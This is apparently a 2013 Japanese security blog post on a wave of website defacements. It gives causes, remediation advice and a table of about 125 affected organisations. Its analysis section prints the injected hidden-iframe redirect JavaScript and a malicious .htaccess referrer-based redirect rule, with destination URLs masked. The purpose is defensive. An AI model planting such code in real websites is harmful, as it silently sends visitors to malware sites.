2013-06-04

概要

5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPAや警察庁、トレンドマイクロもホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblarによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。

改ざんの概要イメージ

現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)

　

改ざんされる内容

複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」等の文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*1

HTMLファイル(.html)
JSPファイル(.jsp)
PHPファイル(.php)
JavaScriptファイル(.js)
JSONファイル(.json)
テンプレートファイル(.tpl)
分散設定ファイル(.htaccess)

今回の改ざんについて調査・考察されている方の記事

尚、JPCERT/CCは埋め込まれる固定文字列が16進数6桁であることから一連の改ざんを「コードネーム COLOR」と呼称して調査しているようです。

静的コンテンツへの改ざん

静的コンテンツへの改ざんは難読化されたJavaScript（数字の羅列の様な文字列）が埋め込まれます。トレンドマイクロによりJS_BLACOLE.SMTTとして検知される実体は埋め込まれたJavaScriptです。実際に実行されるのは次のようなコードです。変数名等、一部は改ざん先によって異なる場合があるようです。悪性サイトへリダイレクトする1pxのIFRAMEが埋め込まれることになります。

function zzzfff()
{
	var egefi = document.createElement('iframe');
	egefi.src = 'http://(リダイレクト先悪性サイトURL)';
	egefi.style.position = 'absolute';
	egefi.style.border = '0';
	egefi.style.height = '1px';
	egefi.style.width = '1px';
	egefi.style.left = '1px';
	egefi.style.top = '1px';
	if (!document.getElementById('egefi'))
	{
		document.write('<div id=\'egefi\'></div>');
		document.getElementById('egefi').appendChild(egefi);
	}
}

function SetCookie(cookieName,cookieValue,nDays,path)
{
	var today = new Date();
	var expire = new Date();
	if (nDays==null || nDays==0) nDays=1;
	expire.setTime(today.getTime() + 3600000*24*nDays);
	document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name )
{
	var start = document.cookie.indexOf( name + "=" );
	var len = start + name.length + 1;
	if ( ( !start ) &&
	( name != document.cookie.substring( 0, name.length ) ) )
	{
		return null;
	}
	if ( start == -1 ) return null;
	var end = document.cookie.indexOf( ";", len );
	if ( end == -1 ) end = document.cookie.length;
	return unescape( document.cookie.substring( len, end ) );
}

if (navigator.cookieEnabled)
{
	if(GetCookie('visited_uq')==55){}
	else
	{
		SetCookie('visited_uq', '55', '1', '/');
		zzzfff();
	}
}

分散設定ファイルへの改ざん

MASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。

#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>

#/0c0896#

改ざんされた原因

現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。

情報ネットワーク法学会

改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており
http://in-law.jp/

神奈川県保険医協会

本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバーに不正アクセスがあり、改ざんされるという被害を受けました
http://www.hoken-i.co.jp/outline/cat272/post_102.html

東京大学医学部付属病院

当院がホームページのコンテンツ管理（CMS）を委託している企業側のパソコンがコンピュータウイルスに感染した事が原因でした。
http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html

また、IPAやJPCERT/CCの注意喚起によるとFTPやSSHアカウント情報を窃取するウィルスの存在に触れられています。

“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルスに感染した”というウイルス感染のケース※もありました。
http://www.ipa.go.jp/security/txt/2013/06outline.html

JPCERT/CC

また、攻撃に使用されている一部のマルウエアには、FTP/SSH クライアントや Web ブラウザなどに保存されている過去に入力したアカウント情報などを窃取する機能を有しているものがあり、Web コンテンツ更新に使用されるアカウント情報がマルウエアにより窃取されている可能性があります。
http://www.jpcert.or.jp/at/2013/at130027.html

さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。

FTPサーバーのhtmlファイル等に勝手にjavascriptが記述されているんですがウイルスでしょうか。。。 - Yahoo!知恵袋

これらから、今回多発している改ざんは、Gumblarのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*2ことが原因で改ざんされたのではないかと考えられます。他には「サーバーやソフトウェアの脆弱性が放置されていた」、「単純なID、パスワードを使っていた」、「そもそも認証等必要なく誰でも更新できる状況だった」も原因として考えられるでしょう。
　

改ざんを受けた場合の対策

改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。

Webサイト管理用のアプリケーション（CMSや管理ソフト）が最新の状態かどうか
Webサイトのメンテナンスは管理端末のみに接続が制限されているか
管理端末でウィルス対策ソフトによるスキャンが行われているか
サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か

また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。

あわせて読みたい
 改ざんを受けた際の対策／改ざんされてないサイトの要確認内容 - wakatonoの戯れメモ

改ざんされていたことを報告したWebサイト一覧

5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。

No	改ざんされたサイト	URL	改ざん期間*3	改ざん原因	改ざん内容	掲載文
1	鹿児島県教職員互助組合	kyogo.or.jp	05/01 2:45〜05/02 13:32	掲載無	ウィルスに感染する可能性	*4
2	アウンコンサルティング株式会社	www.auncon.co.jp	05/01〜05/07	サーバーへの不正アクセス	ウィルスに感染する可能性 HEUR:Trojan.Script.Generic	*5
3	削除要請があっため削除	−	−	−	−	−
4	世界人権問題研究センター	www.mmjp.or.jp/jinken	05/21〜05/28午後	デンマークからの不正アクセス	ウィルスに感染する可能性	6 7
5	有限会社APCブレーン	APCブレーン及び所属アーティスト含む関連ページ www.apc-brain.co.jp レディバード www.apc-brain.co.jp/ladybird	05/22 19:37〜05:26 1:27	掲載無	ウィルスに感染する可能性 Trojan:JS/Rediredtor.MB	*8
6	日本産業廃棄物処理振興センター	www.jwnet.or.jp/whatsnew/index.php www.jwnet.or.jp/oshirase/index.php www.jwnet.or.jp/workshop/index.php	掲載無(修正は05/17)	掲載無	ウィルスに感染する可能性 TROJ_FAKEAV亜種	*9
7	リコージャパン	プリントアウトファクトリー www.printout.jp	05/25 7時頃〜05/31 22時半頃	掲載無	ウィルスに感染する可能性トロイの木馬型マルウェア	*10
8	株式会社ディーバ	www.diva.co.jp	05/25 15:50〜05/29 15:10	第三者の不正アクセス	ウィルスに感染する可能性	*11
9	科学技術振興機構	crds.jst.go.jp/5th/ crds.jst.go.jp/about_sympo/ crds.jst.go.jp/access/ crds.jst.go.jp/GIES/ crds.jst.go.jp/daily/	05/25〜05/27 10時頃 2013/06/01〜2013/06/03 11時55分	掲載無	悪性サイトへ誘導される可能性	*12
10	三重交通グループホールディングス株式会社	観光販売システムズホームページ kanko-pro.co.jp トライパルツアー sanq-tripal.com 熊野古道シャトルバス Kumanokodo.co.jp みえ観光ウェブ mie-kanko.jp	05/26 17:00〜06/01 17:00	掲載無	ウィルスに感染する可能性	13 14
11	横浜シティ・エア・ターミナル株式会社	YCAT www.ycat.co.jp	05/26 23:00〜05/27 17:00	掲載無	ウィルスに感染する可能性	*15
12	神奈川県保険医協会	「いい医療.com」の一部	05/27 0:00〜14:00	PC経由による不正アクセス	悪性サイトへ誘導される可能性	16 17
13	美浜町	www.town.mihama.aichi.jp	05/28 13:00〜16:00	掲載無	ウィルスに感染する可能性	*18
14	田原総一郎	www.taharasoichiro.comの一部	05/28〜05/29 13時	掲載無	悪性サイトへ誘導	*19
15	株式会社アーク	京のすっぴんさん www.suppinsan.com	05/28 15:17〜05/29 14:00	掲載無	ウィルスに感染する可能性	*20
16	ワタナベランド	LAND et vous landetvous.com	掲載無(掲載日付は05/29)	掲載無	ウィルスに感染する可能性	*21
17	ミツミ電機株式会社	www.mitsumi.co.jp	5/29 7:20〜13:37	3回にわたり不正アクセス	ウィルスに感染する可能性	*22
18	株式会社アジュバンコスメジャパン	Re:PRO www.repro-top.com	05/29 17:00〜06/01 9:25	掲載無	ウィルスに感染する可能性 JS_Trojan.Crypt.MT	*23
19	情報ネットワーク法学会	in-law.jp配下のWebページ全て	05/29 19時〜05/30 12時	FTPあるいはSSH	悪性サイトへ誘導	*24
20	沖縄県	県立玉城青少年の家 www.okinawa-nanjo-youthhome.jp	05/29 20:00〜06/03 11:00	掲載無	文字化けウィルスに感染する可能性	*25
21	山梨県立塩山高等学校	塩山高校商業研究部 www.enzanh.kai.ed.jp/ENZAN business research club WEB/配下のページ塩山高校女子ソフトボール部 www.enzanh.kai.ed.jp/ENZAN softball club WEB/配下のページ	05/29〜05/30	掲載無	ウィルスに感染する可能性	*26
22	フジ印刷株式会社	WarpStyle warpstyle.jp	05/29〜05/30 12:00	Webサーバーへの不正アクセス	ウィルスに感染する可能性	*27
23	横浜市	横浜観光情報 www.welcome.city.yokohama.jp	05/30 4:00〜16:30	掲載無	書き換えられたのみ	*28
24	横浜市	www.kuraki-noh.jp	05/30 10:00〜06/04 12:10	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	29 30
25	日比谷アミューズメントプランニング	らんの里堂ヶ島 www.dogashima.com	05/30 14:16〜18:22	掲載無	ウィルスに感染する可能性悪性サイトへ誘導される可能性	*31
26	愛知県バドミントン協会	www.badminton-aichi.comの一部	05/30 17:13〜06/01 17:30	掲載無	ウィルスに感染する可能性	*32
27	東京大学医学部付属病院	www.h.u-tokyo.ac.jp	05/30 20:00〜05/31 2:30	管理業者PC感染による改ざん	ウィルスに感染する可能性	*33
28	ときめきドットコム	シンニチプレミアムストア njpw-p.jp	05/30 19時〜06/03 14時	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*34
29	姫路市まちづくり振興機構	himeji-machishin.jp	05/31 4:30〜17:00	掲載無	ウィルスに感染する可能性	*35
30	株式会社幼児教育実践研究所	こぐま会 www.kogumakai.co.jp	05/31 18:30〜06/04 10:00	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*36
31	株式会社テレワークマネジメント	www.telework-management.co.jpの一部	05/31未明〜11時頃	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*37
32	☆脱！カラオケコンプレックス	www.arcadia.gr.jp	5月末〜06/04 AM	掲載無	ウィルスに感染する可能性 HEUR:Trojan.Script.Generic	*38
33	エフエム群馬	fmgunma.com配下の248ファイル	06/01 5時〜06/03 13時	外部から不正アクセス	ウィルスに感染する可能性	39 40
34	仙台市農作物有害鳥獣対策協議会	www.inocc.jpの一部	06/01〜06/03アクセス	掲載無	ウィルスに感染する可能性	*41
35	株式会社ウェブメッセージ	plaza.rakuten.co.jp/toretama/	06/01〜06/02	掲載無	掲載無	*42
36	北海道文教大学	www.do-bunkyodai.ac.jp	掲載無(06/02に判明)	掲載無	ウィルスに感染する可能性	*43
37	神戸市立桃山台児童館	www.eonet.ne.jp/~momoyamadai/	06/02〜06/03	掲載無	ウィルスに感染する可能性	*44
38	日本馬術連盟	www.equitation-japan.comの一部	06/04 15:47〜17:25	掲載無	掲載無	*45
39	有限会社ゆたぷろ	www.yutapro.comの一部	06/04 17:00〜06/05 11:45	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*46
40	能登空港利用促進協議会	www.notohantou.net	06/05 1:00〜10:00	第三者の不正アクセス	トップページが表示されないウィルスに感染する可能性	*47
41	札幌市	札幌市ワークライフ・バランス推進事業 www.sapporo-wlb.jp	改ざん時期不明〜06/05 0:10	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	48 49
42	日本創造教育研究所	ありがとう経営のすすめ arigatou-keiei.jp 業績アップ研修.com gyoseki-up.com 心に残るありがとう体験談募集 arigatou-taiken.jp 朝礼.com cho-rei.com ありがとう卓越経営大賞 arigatou-takuetsu.jp 人事セミナー.com yarigai-jinji.com ありがとうブログ arigatou-blog.com 建設みらい研究所 kensetsu-mirai.com	05/29 20:42〜05/30 11:13	掲載無	ウィルスに感染する可能性 Gumblarの亜種	*50
43	有限会社ビブリオポリ	www.bibliopoly.co.jp	掲載無	掲載無	掲載無	*51
44	株式会社アーク	www.organic-skincare.jpの一部	05/28 15:17〜05/29 12:40	第三者の不正アクセス	ウィルスに感染する可能性	*52
45	アール・ビー・コントロールズ株式会社	www.rbcontrols.co.jpのHTMLファイル全て	06/02 10:20〜06/03 10:00	第三者の不正アクセス	ウィルスに感染する可能性 JS/Kryptik.AKY	*53
46	エスペック株式会社	Test-Navi www.test-navi.com	06/04 17:00〜06/05 12:00	第三者の不正アクセス	ウィルスに感染する可能性	*54
47	札幌市	ようこそさっぽろ www.welcome.city.sapporo.jp	掲載無(06/05 9:00発覚)〜06/06 20:00	掲載無	掲載無	55 56
48	早稲田スポーツ新聞会	www.wasedasports.com	掲載無(06/05 22:32時点で改ざん確認)	掲載無	掲載無	*57
49	寺本法律会計事務所	teramoto-law.jp	05/31〜06/06	第三者の不正アクセス	ウィルスに感染する可能性	*58
50	函館信用金庫	www.hakodate-shinkin.jpの一部	06/03 1:00〜06/04 9:30	第三者の不正アクセス	ウィルスに感染する可能性	*59
51	株式会社トヨシマ	www.kk-toyoshima.co.jpの一部	05/29〜06/03	第三者の不正アクセス	ウィルスに感染する可能性	*60
52	浜松グリーンウェーブ株式会社	www.hgw.co.jpの一部	06/03 4:00〜06/06 22:00	第三者の不正アクセス	ウィルスに感染する可能性	61 62
53	株式会社アーク	ふじ光成堂薬局 www.sasaherusu.comの一部	05/28 15:17〜05/29 12:40	第三者の不正アクセス	ウィルスに感染する可能性	*63
54	株式会社アーク	ふじ光成堂薬局 www.organic-skincare.jpの一部	05/28 15:17〜05/29 12:40	第三者の不正アクセス	ウィルスに感染する可能性	*64
55	上毛新聞TRサービス	TRサービスホームページ www.j-tr.jp デリジェイホームページ deli-j.j-tr.jp	掲載無(06/04判明)	掲載無	ウィルスに感染する可能性 JS_BLACOLE.SMTT	65 66
56	北恵株式会社	www.kitakei.jp	06/01 23:00〜06/04 12:00	外部委託サーバーへ不正アクセス	ウィルスに感染する可能性 JS/Kryptik.ANY	*67
57	有限会社アップフィールド	日報Webシステム np-sys.info	05/25 16:50〜05/30 00:00	掲載無	ウィルスに感染する可能性	*68
58	株式会社一幸陶苑	PRIMAG www.pri-mug.com	掲載無	掲載無	ウィルスに感染する可能性	*69
59	株式会社エー・ティー・エックス	複数の特設ページ www.at-x.com/html/	06/04〜06/06 20:00	第三者の不正アクセス	ウィルスに感染する可能性	*70
60	株式会社ミノウラ	www.mnr.co.jp	05/03〜05/28	第三者の不正アクセス	ウィルスに感染する可能性	*71
61	日本デオドール株式会社	www.deodor.co.jp	05/28〜06/02	国外からの不正アクセス	掲載無	*72
62	大富士フットボールクラブ	ohfuji-fc.com	05/04〜05/06	掲載無	ウィルスに感染する可能性	*73
63	葉鍼灸院	you-sinkyu-in.com	05/28 15:31〜19:48	米国からの不正アクセス	ウィルスに感染する可能性	*74
64	板橋区立成増小学校支援地域本部	narimasu.gr.jp	05/18 13:00〜22:00	第三者の不正アクセス	ウィルスに感染する可能性	*75
65	株式会社CRAZY TV	www.crazytv.com	05/29〜06/03	第三者の不正アクセス	ウィルスに感染する可能性	*76
66	株式会社かなえるリンク	www.kanaerulink.co.jp	06/02 11:50〜06/04 18:00	第三者の不正アクセス	ウィルスに感染する可能性	*77
66	緑秀会田無病院	www.tanashi-hospital.or.jp	/06/03 1:00〜06/04 12:00	第三者の不正アクセス	ウィルスに感染する可能性	*78
67	株式会社ドゥ・ハウス	モラタメ.net www.moratame.net	06/05 18:44〜06/07 6:30	第三者の不正アクセス	ウィルスに感染する可能性	*79
68	札幌静修高等学校	www.sapporoseishu.ed.jp	06/02 14:00〜06/04 9:00	第三者の不正アクセス	ウィルスに感染する可能性	*80
69	日本文化出版株式会社	NBPオンラインショッピング shop.nbp.ne.jp	05/30 8:00〜06/06 20:00	第三者の不正アクセス	ウィルスに感染する可能性	*81
70	海洋研究開発機構	高知コア研究所 www.kochi-core.jp	05/25〜05/29	第三者の不正アクセス	ウィルスに感染する可能性	*82
71	ゑびすや	www.ebisuyagolf.com	06/02〜06/05 15:00	第三者の不正アクセス	ウィルスに感染する可能性	*83
72	すみだ産業会館	www.sumidasangyokaikan.jp	06/05	第三者の不正アクセス	ウィルスに感染する可能性	*84
73	地盤工学会	電子図書室サービス www.jgs-library.net	掲載無(06/03判明)〜06/04	第三者の不正アクセス	ウィルスに感染する可能性	*85
74	愛知・豊川用水振興協会	aitoyo.or.jp	05/29 15:00〜06/06 18:00	第三者の不正アクセス	ウィルスに感染する可能性	*86
75	栄信電気工業株式会社	www.eisin.co.jpの一部	05/31〜06/03	第三者の不正アクセス	ウィルスに感染する可能性	*87
76	登録紹介宣伝あくせすくん	park1.wakwak.com/~com/	掲載無(06/01掲載)	不明	不明	*88
77	日本赤十字社	www.jrc.or.jp	05/30 20:00〜21:54	第三者による改ざん	ウィルスに感染する可能性	*89
78	株式会社HKS	バスデポ bus-depot.in	06/04 23:00〜06/06 12:00	第三者による不正アクセス	ウィルスに感染する可能性	*90
79	石川県教職員互助会	www.ishikyogo.or.jpの一部	05/31 0:00〜16:00	第三者による不正アクセス	ウィルスに感染する可能性	*91
80	株式会社アクア	www.aqua-ltd.com	05/31 7:39〜06/05 2:46	第三者による不正アクセス	ウィルスに感染する可能性	*92
81	国立民族学博物館	関雄二教授個人HP www.r.minpaku.ac.jp/sekito/	05/25〜06/06	第三者による不正アクセス	ウィルスに感染する可能性	*93
82	長谷川敬税理士事務所	office-hasegawa.com	05/29〜06/03 19:00	第三者による不正アクセス	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*94
83	TokiwagiFC Fan	tokiwagifcfan.com	掲載無(06/04に判明)	掲載無	ウィルスに感染する可能性	*95
84	東京こけし友の会	www.tokyo-kokeshi.jp	05/30〜06/04	掲載無	掲載無	*96
85	ΜΟΟΥΣΕΊΟΝ	www.moouseion.com www.hisaoh.com www.letharia.com	05/28〜05/30	海外からの不正アクセス	掲載無	*97
86	松菱金属工業株式会社	www.matsubishi-kinzoku.co.jpの一部	06/01 16:40〜06/04 16:40	悪意を持った第三者からの攻撃	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*98
87	日本グラフィックサービス工業会	www.jagra.or.jp	06/03 2:00〜10:00	掲載無	ウィルスに感染する可能性トロイの木馬 (不正JavaScriptの埋め込み)	*99
88	盛岡三菱自動車販売株式会社	morioka-mitsubishi.com	06/04 18:30〜06/06 13:00	第三者の不正アクセス	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*100
89	北海道文化財団	haf.jpの一部	05/30〜06/03	第三者の不正アクセス	ウィルスに感染する可能性	*101
90	ふどうさんの現代屋	www.gendaiya.com	掲載無(06/13発表)	海外からのFTP接続	掲載無	*102
91	株式会社さうすウェーブ	southwave.co.jp	06/01 0:00〜06/04 18:00	第三者の不正アクセス	ウィルスに感染する可能性	*103
92	湘南鎌倉総合病院	shonankamakura.or.jp	06/11 6:40〜13:05	第三者の不正アクセス	ウィルスに感染する可能性	*104
93	株式会社HASUNA	www.hasuna.co.jpの一部	05/31 3:00〜06/03 8:30	掲載無	ウィルスに感染する可能性	*105
94	日本コンクリート工学会	www.jci-net.or.jp	06/02 11:00〜06/03 12:15	掲載無	ウィルスに感染する可能性	*106
95	ライオン堂	www.lion-do.jp/	05/28〜06/06	不正アクセス	ウィルスに感染する可能性	*107
96	あんしん堂	www.nsg-a.jp www.ansindo.jp	06/03〜06/11	英仏デンマークからのFTPへの不正アクセス	ウィルスに感染する可能性	*108
97	ニルフィスクアドバンス株式会社	www.nilfisk-advance.co.jpの一部	06/03〜06/07	第三者の不正アクセス	ウィルスに感染する可能性	*109
98	ライブラリーコンテンツサービス株式会社	www.lib-con.jp	06/13 5:20〜10:30	第三者の不正アクセス	ウィルスに感染する可能性	*110
99	ヒーリングルーム愛	healingroomai.com	06/12 05:30〜06:14 13:00	掲載無	ウィルスに感染する可能性	*111
100	トヨタ自動車株式会社	www2.toyota.co.jp/jp/news/	06/05 18:26〜06/14 21:47	第三者の不正アクセス	ウィルスに感染する可能性	*112
101	中小企業経営革新支援ネットワーク	chusho-kakushin.netの一部	05/31〜06/06	第三者の不正アクセス	ウィルスに感染する可能性	*113
102	DXアンテナ株式会社	www.dxantenna.co.jp	05/29 18:29〜05/30 18:38	第三者の不正アクセス	ウィルスに感染する可能性	*114
103	新陽ビニール工業株式会社	shinyo-v.co.jp	05/28 05:00〜06/13	第三者の不正アクセス	ウィルスに感染する可能性 JS_BLACOLE.SMTT	*115
104	情報処理学会	情報規格調査会 www.itscj.ipsj.or.jp	06/15〜06/17(詳細調査中)	掲載無	ウィルスに感染する可能性	*116
105	株式会社グローバルスズキ	global-suzuki.com	05/08〜05/20	第三者の不正アクセスサイト管理システムの脆弱性を突かれた可能性	ウィルスに感染する可能性	*117
106	なんぶの湯	www.nanbunoyu.jp	06/07〜06/17	サーバー上の脆弱性を突かれた可能性	ウィルスに感染する可能性	*118
107	株式会社サンコンタクトレンズ	www.sun-con.comの一部	06/08〜06/13	第三者の不正アクセス	ウィルスに感染する可能性	*119
108	ときめきドットコム株式会社	charaheroes.jp	06/14 09:55〜16:05	第三者の不正アクセス	ウィルスに感染する可能性	*120
109	WHO's Generation	www.whosgeneration.info	掲載無(06/10判明)	第三者の不正アクセス	ウィルスに感染する可能性	*121
110	慶應義塾体育会フェンシング部	keio-fencing.main.jp	06/01〜06/03 20:13	第三者の不正アクセス	ウィルスに感染する可能性	*122
111	ナチュラル鍼灸治療院	ameblo.jp/natural-harikyu/	掲載無(06/18判明)	第三者の不正アクセス	ウィルスに感染する可能性	*123
112	OliveBeauty	www.olivebeauty-s.com	06/12〜06/13	第三者の不正アクセス	ウィルスに感染する可能性	*124
113	道の駅サザンセトとうわ	www.sazan-seto.com	06/10〜(06/20お詫び掲載)	第三者の不正アクセス	ウィルスに感染する可能性	*125
114	株式会社FIT	www.fitcoltd.com	06/16、06/23	第三者の不正アクセス	ウィルスに感染する可能性	*126
115	株式会社ウチダレック	www.uchidarec.comの一部	06/23 10:40〜06/24 11:00	第三者の不正アクセス	ウィルスに感染する可能性	*127
116	榊電業株式会社	www.sakaki-elc.co.jp	06/23 05:00〜06/25 14:00	第三者の不正アクセス	ウィルスに感染する可能性	*128
117	プラスワンリビングハウス株式会社	プラスワンリビング www.plusoneliving.jp プラスワンリビングハウス plusonelivinghouse.jp	06/08 10:00〜06/13 16:00	第三者の不正アクセス	ウィルスに感染する可能性	*129
118	東邦レオ株式会社	エコガーデン.JP www.ecogarden.jp まちなか菜園 www.machinaka-saien.jp クリエイティブグリーン www.mansion-green.jp	06/12 11:00〜06/13 16:00	第三者の不正アクセス	ウィルスに感染する可能性	*130
119	三菱地所株式会社	空と土プロジェクト www.soratsuchi.com内のフォーム	06/12 04:52〜06/24 14:00	第三者の不正アクセス	ウィルスに感染する可能性	*131
120	二宮町	www.town.ninomiya.kanagawa.jp	06/23 10:00〜06/24 14:00	第三者の不正アクセス	ウィルスに感染する可能性	*132
121	鹿児島大学共同獣医学部附属動物病院	www.kuvth.com	05/17〜05/29	第三者の不正アクセス	ウィルスに感染する可能性	*133
122	茨城県警備業協会	ibaraki.r.ajssa.or.jp	05/28〜06/03	第三者の不正アクセス	ウィルスに感染する可能性	*134
123	特例民法法人移行手続研究会	tokureiminpouhoujin119.com/	05/31〜06/06	第三者の不正アクセス	悪性サイトへリダイレクトされる可能性	*135
124	兼進刃物製作所	kaneshin-seki.com	06/11 5:00〜06/17 10:00	第三者の不正アクセス	ウィルスに感染する可能性	*136
125	鹿児島大学大学院臨床心理学研究科	www.leh.kagoshima-u.ac.jp/kumcp/	05/24〜06/21	第三者の不正アクセス	ウィルスに感染する可能性	*137